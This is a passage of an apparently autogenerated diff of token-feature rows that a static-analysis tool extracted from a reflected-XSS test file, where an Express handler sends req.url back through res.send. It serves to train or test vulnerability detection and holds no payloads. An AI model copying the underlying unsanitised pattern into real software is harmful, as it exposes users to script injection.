autogenerated/Xss/ReflectedXss/partial.js:45:12:45:19 | getFirst | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:45:21:45:21 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:45:24:45:24 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:24:45:24 | y | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:45:24:45:24 | y | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:45:24:45:24 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:45:24:45:24 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:46:12:46:12 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:46:12:46:12 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:46:12:46:12 | x | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:46:12:46:12 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:46:12:46:12 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:14 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:14 | callback | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:14 | callback | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:14 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:14 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callbac ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callbac ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callbac ... eq.url) | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callbac ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callbac ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callback | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callback | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:7:49:45 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:25 | getFirst | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:25 | getFirst | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:25 | getFirst | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:25 | getFirst | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:25 | getFirst | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:30 | getFirst.bind | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:30 | getFirst.bind | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:30 | getFirst.bind | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:30 | getFirst.bind | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:30 | getFirst.bind | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | exceptional return of getFirs ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | exceptional return of getFirs ... eq.url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | exceptional return of getFirs ... eq.url) | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | exceptional return of getFirs ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | exceptional return of getFirs ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | getFirs ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | getFirs ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | getFirs ... eq.url) | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | getFirs ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:18:49:45 | getFirs ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:49:27:49:30 | bind | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:27:49:30 | bind | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:49:27:49:30 | bind | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:27:49:30 | bind | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:27:49:30 | bind | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:49:32:49:35 | null | CalleeFlexibleAccessPath | getFirst.bind | | autogenerated/Xss/ReflectedXss/partial.js:49:32:49:35 | null | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:49:32:49:35 | null | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21779,6 +145033,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:49:32:49:35 | null | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:49:32:49:35 | null | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:49:32:49:35 | null | receiverName | getFirst | +| autogenerated/Xss/ReflectedXss/partial.js:49:38:49:40 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:38:49:40 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:49:38:49:40 | req | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:38:49:40 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:38:49:40 | req | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:49:38:49:44 | req.url | CalleeFlexibleAccessPath | getFirst.bind | | autogenerated/Xss/ReflectedXss/partial.js:49:38:49:44 | req.url | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/partial.js:49:38:49:44 | req.url | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21787,6 +145046,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:49:38:49:44 | req.url | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:49:38:49:44 | req.url | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:49:38:49:44 | req.url | receiverName | getFirst | +| autogenerated/Xss/ReflectedXss/partial.js:49:42:49:44 | url | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:49:42:49:44 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:49:42:49:44 | url | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:49:42:49:44 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:49:42:49:44 | url | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:5 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:5 | res | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:5 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:10 | res.send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:10 | res.send | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:10 | res.send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | exceptional return of res.send(callback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | exceptional return of res.send(callback) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | exceptional return of res.send(callback) | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | exceptional return of res.send(callback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | exceptional return of res.send(callback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | res.send(callback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | res.send(callback) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | res.send(callback) | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | res.send(callback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:51:3:51:20 | res.send(callback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:51:7:51:10 | send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:51:7:51:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:51:7:51:10 | send | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:51:7:51:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:51:7:51:10 | send | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:51:12:51:19 | callback | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/partial.js:51:12:51:19 | callback | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:51:12:51:19 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21795,6 +145084,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:51:12:51:19 | callback | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:51:12:51:19 | callback | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:51:12:51:19 | callback | receiverName | res | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:5 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:5 | res | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:5 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:10 | res.send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:10 | res.send | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:10 | res.send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | exceptional return of res.send(callback()) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | exceptional return of res.send(callback()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | exceptional return of res.send(callback()) | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | exceptional return of res.send(callback()) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | exceptional return of res.send(callback()) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | res.send(callback()) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | res.send(callback()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | res.send(callback()) | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | res.send(callback()) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:52:3:52:22 | res.send(callback()) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:52:7:52:10 | send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:52:7:52:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:52:7:52:10 | send | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:52:7:52:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:52:7:52:10 | send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:19 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:19 | callback | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:19 | callback | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:19 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:19 | callback | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | callback() | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | callback() | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | callback() | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21803,6 +145122,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | callback() | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | callback() | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | callback() | receiverName | res | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | exceptional return of callback() | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | exceptional return of callback() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | exceptional return of callback() | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | exceptional return of callback() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:52:12:52:21 | exceptional return of callback() | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:5 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:5 | res | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:5 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:10 | res.send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:10 | res.send | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:10 | res.send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | exceptional return of res.sen ... ello")) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | exceptional return of res.sen ... ello")) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | exceptional return of res.sen ... ello")) | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | exceptional return of res.sen ... ello")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | exceptional return of res.sen ... ello")) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | res.sen ... ello")) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | res.sen ... ello")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | res.sen ... ello")) | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | res.sen ... ello")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:54:3:54:29 | res.sen ... ello")) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:54:7:54:10 | send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:54:7:54:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:54:7:54:10 | send | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:54:7:54:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:54:7:54:10 | send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:19 | getFirst | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:19 | getFirst | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:19 | getFirst | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:19 | getFirst | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:19 | getFirst | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | exceptional return of getFirst("Hello") | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | exceptional return of getFirst("Hello") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | exceptional return of getFirst("Hello") | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | exceptional return of getFirst("Hello") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | exceptional return of getFirst("Hello") | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | getFirst("Hello") | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | getFirst("Hello") | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | getFirst("Hello") | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21811,12 +145170,76 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | getFirst("Hello") | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | getFirst("Hello") | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:54:12:54:28 | getFirst("Hello") | receiverName | res | +| autogenerated/Xss/ReflectedXss/partial.js:54:21:54:27 | "Hello" | CalleeFlexibleAccessPath | getFirst | +| autogenerated/Xss/ReflectedXss/partial.js:54:21:54:27 | "Hello" | InputArgumentIndex | 0 | +| autogenerated/Xss/ReflectedXss/partial.js:54:21:54:27 | "Hello" | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:54:21:54:27 | "Hello" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:54:21:54:27 | "Hello" | enclosingFunctionBody | req res getFirst x y x callback getFirst bind null req url res send callback res send callback res send getFirst Hello | +| autogenerated/Xss/ReflectedXss/partial.js:54:21:54:27 | "Hello" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:54:21:54:27 | "Hello" | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/promises.js:1:1:1:0 | this | 